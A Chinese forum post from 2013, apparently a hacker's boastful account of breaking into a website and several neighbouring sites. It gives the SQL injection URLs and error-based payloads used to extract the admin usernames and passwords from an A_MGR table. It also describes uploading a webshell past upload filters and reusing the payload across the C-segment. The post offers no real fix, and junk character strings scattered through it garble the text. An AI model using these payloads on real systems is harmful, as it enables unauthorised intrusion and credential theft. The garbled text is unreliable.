发现一个注入点
' A+ O6 |; T; N( X4 N: ihttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833892 x+ z3 u) X) l3 x* \
0 @2 E5 t2 i8 R& R习惯性的加’having1=1--; Y& v! p9 ]/ ^- ^: x6 e8 I; y8 o
8 I8 f* ?* W3 K: n& i' v( Z; u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
# y, J; p7 w. [% _0 V9 y2 ]0 v: N/ C+ T
0
2 S! w$ m) F; N: z: F
: S5 t% O& B. X: j爆出Diary_A.dl_Title(这时候很激动啊). l+ ?/ F) A- V! I! P. V8 p# {
6 f! a& y& Y9 K l8 _& x9 x+ C8 r9 B
那么继续. b4 w' s) J. F5 N
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
- t4 [9 Z- E( g' w5 V" p* m( t5 U
1 I$ r" j& j ~! Q继续,一直爆下去( {% l F0 O h) C7 L
, G) w0 O$ h- z( J. Z爆到几个字段和表段 但是没找到需要的管理用户的字段 k1 { j! Y& ]; n; U5 R; k
! m3 I h6 F! o: @. M蛋疼了 怎么办 然后去后台登陆页看源码4 y/ s0 x1 O2 w( R5 E, E/ \0 M- z
+ r* x, D8 M5 ^* y& _ F' F- |01 ~- w0 `" h$ c% N& F' {/ x
' e, {. R1 }1 V* u* T1 R
Input name= “ADUID”4 M3 {% a; U" [0 _0 }
Input name= “ADPWD”
' i6 N! T- W6 `
; d. |- n, t3 {$ r- u# S6 z很幸运 找到了字段那就继续( N. h4 D$ K6 C) H* u* g/ i8 ]
找到之后开始爆用户; Q; z$ e3 {& J
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
: P' P; {5 e; ?; I% r: n爆密码
- Q" v; V0 H# s9 K6 \http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—- z9 E/ P5 I: P" D, r; V8 _
测试了下 这个注入点只能爆到文章哪里的表
; J$ v9 s; L7 D& f
; b4 U6 i* X% J6 ^ a头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了, T; |5 Z1 D! C( ]7 N. E
* j$ l6 ?7 a" C% c8 ~2 j又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
1 {3 f/ k3 _6 o m( j& ~7 o; ^& j
473
* }9 U7 P4 h* _. t
$ \8 g' e0 Q: h8 U6 d, g: s7 d7 t6 M; F进后台8 A" y' i! v( T6 i4 b( ^' E2 w
* |& s5 j2 H* u: T2 ?
2 p& F5 g5 H2 Z7 v1 ?3 V# _发现几个上传点 有的地方不能上传 而且防止恶意代码
* I+ d% C3 j v. L4 Z$ c+ D0 U* q ?0 k3 p# }6 P
没办法 各种百度各种找大牛 找到一只好像可以突破的马
' j+ k7 ?9 j3 s4 V1 g) {. U
; [* [+ [( e- G% l0 t+ E& p4 R0 W; H! t: C5 o
在系统管理那里直接上传 不过没有显示地址
6 V! Z! Y( I/ j. ~; g# {
9 e0 G5 f7 R# s3 @& U7 ]0 ~9 C再上传一次 抓包 搞定OK0 M( J, b6 @' T% x0 U; N8 t% A
6 j9 T0 i# a' A* [
, p- I$ k4 g. A* @1 ? T% h0 h1 ?) v3 `4 E# A9 B5 g) N
472
6 d' {+ b! w% t3 c3 H+ t1 y5 r$ G4 _* p- z! R
晚上不行了 去睡觉。。。
+ H0 M- H3 c: s( B+ I5 K第二天刚起床 闲的没事做继续日站吧 ' d. U: C1 L% _9 y p% _$ _" [
4 F0 R, B z5 Z找个站 就把这个站的旁c扫了下. h$ R7 S3 s! D2 v0 q9 Y& c7 N
& W. B3 B" j% ^( [! f/ p7 r2 O% d发现c段也有一个购物站 ,然后还和这个站的模板差不多' ~7 {6 S3 J& V" A2 ^
6 V2 m' _8 M) O V J就找到会员登录口测试
4 Q3 U4 u4 B; F% S
- D1 ^$ X% u7 c2 ^5 ['and (select top 1 MGR_UID from A_MGR)>0—
5 R/ F/ p$ N( j4 J3 P果断爆到了 这时候我很激动 通杀 T/ {6 ?# H" ]6 d
5 ?" ]. c1 O! C+ }. D再次翻c段
+ N( H% @' r+ z" {. P" Z6 }
, a; h+ i/ l2 K1 |" w翻出几个站 都成功拿下
6 S# S! a: X+ ~+ m2 H5 Q1 W
- Y) C& M( g7 H
, ~* n6 X( g0 q* j* B) f L4 T! A3 z6 z" k- r/ y3 ?0 a* d
修复方案:
- Y4 w$ z5 f' A他们比我专业 7 t" Z! R6 a. M3 \% y
5 r, }% e6 S! B* r
# w% L, J, `. Y& W
; n: K3 K( A( b! T6 u |
发表于 2013-4-4 17:40:38
收藏
支持
反对